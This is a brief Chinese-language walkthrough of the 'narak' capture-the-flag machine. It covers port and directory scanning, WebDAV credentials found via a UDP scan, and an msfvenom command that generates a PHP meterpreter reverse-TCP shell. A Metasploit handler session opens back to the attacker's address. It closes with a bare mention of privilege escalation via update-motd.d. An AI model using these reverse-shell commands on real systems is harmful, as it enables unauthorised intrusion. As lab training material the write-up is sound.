narak

拿shell

信息收集

先拿nmap扫

Wappalyzer

dirb

发现tips.txt和http://192.168.10.157/webdav/
查看 tips.txt
Hint to open the door of narak can be found in creds.txt.
找不到creds.txt
再用UDP扫描一遍

发现开着68，69

拿到yamdoot:Swarg 可以登录到http://192.168.10.157/webdav/

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.10.241 LPORT=5820 -f raw > shell.php

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LPORT 5820
LPORT => 5820
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:5820 
[*] Meterpreter session 1 opened (192.168.10.241:5820 -> 192.168.10.157:38638) at 2020-10-04 15:39:27 +0800

meterpreter > 

提权

获取到www-data权限惹

update-motd.d

当使用 telnet 连接主机时，主机的登入画面就会显示